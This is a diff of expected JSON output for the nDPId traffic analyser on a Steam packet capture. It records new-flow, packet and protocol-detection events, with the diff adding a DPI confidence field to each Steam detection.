 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"steam.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1357332164737,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332164737,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARHb3AqLyVRI5bJLJhaYkALD4wVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00597{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"steam.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164737,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.36","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"steam.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164737,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.36","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"steam.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164737,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"steam.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1357332164737,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332164737,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkyDAqLyVkkKYDLJhaYoALLOSVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00598{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"steam.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164737,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"steam.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164737,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"steam.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1357332164761,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332164761,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWSYAAIARjXhFHJGswKi8lWmKsmEANLLiVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAzAy3GMcAAAA="}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"steam.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164786,"flow_last_seen":1357332164786,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164786,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"steam.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1357332164786,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332164786,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+LzAqLyVUatzB7JhaYoALBkvVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00598{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"steam.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164786,"flow_last_seen":1357332164786,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164786,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"steam.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164786,"flow_last_seen":1357332164786,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164786,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"steam.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164787,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.171.83","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"steam.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1357332164787,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332164787,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARQazAqLyV0G+rU7JhaYkALGIfVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"steam.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164787,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.171.83","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"steam.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164787,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.171.83","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"steam.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164787,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"steam.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1357332164787,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332164787,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+LvAqLyVUatzCLJhaYsALBktVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"steam.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164787,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"steam.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164787,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"steam.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164787,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.170","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"steam.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1357332164787,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332164787,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR5qjAqLyVRRyRqrJhaYkALAccVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"steam.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164787,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.170","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"steam.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164787,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.170","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"steam.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1357332164823,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332164823,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWScAAIARjXlFHJGqwKi8lWmJsmEANPbVVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAA7fJcQrwAAAA="}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"steam.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1357332164834,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332164834,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWSgAAIARxIxEjlskwKi8lWmJsmEANPCBVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAzHF5K\/4AAAA="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"steam.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164836,"flow_last_seen":1357332164836,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164836,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"steam.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1357332164836,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332164836,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkx7AqLyVkkKYDrJhaYsALLOPVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"steam.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164836,"flow_last_seen":1357332164836,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164836,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"steam.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164836,"flow_last_seen":1357332164836,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164836,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"steam.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164836,"flow_last_seen":1357332164836,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164836,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.187","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"steam.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1357332164836,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332164836,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNw\/AqLyVSKU9u7JhaYoALFeBVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"steam.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164836,"flow_last_seen":1357332164836,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164836,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.187","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"steam.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164836,"flow_last_seen":1357332164836,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164836,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.187","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"steam.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164837,"flow_last_seen":1357332164837,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164837,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.172","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"steam.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1357332164837,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332164837,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR5qbAqLyVRRyRrLJhaYkALAcaVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"steam.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164837,"flow_last_seen":1357332164837,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164837,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.172","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"steam.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164837,"flow_last_seen":1357332164837,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164837,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.172","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"steam.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164837,"flow_last_seen":1357332164837,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164837,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"steam.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1357332164837,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332164837,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+L3AqLyVUatzBrJhaYsALBkvVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"steam.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164837,"flow_last_seen":1357332164837,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164837,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"steam.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164837,"flow_last_seen":1357332164837,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164837,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"steam.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1357332164869,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332164869,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWSkAAIARjXVFHJGswKi8lWmJsmEANAokVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAumV7f70AAAA="}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"steam.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1357332164873,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332164873,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWSoAAIAR3dxIpT27wKi8lWmKsmEANMZ2VlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAjNtWHqQAAAA="}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"steam.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1357332164876,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332164876,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWSsAAIAROeySQpgNwKi8lWmKsmEANDIHVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAhmUJFOgAAAA="}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"steam.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164886,"flow_last_seen":1357332164886,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164886,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.34","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"steam.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1357332164886,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332164886,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARHb\/AqLyVRI5bIrJhaYkALD4yVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
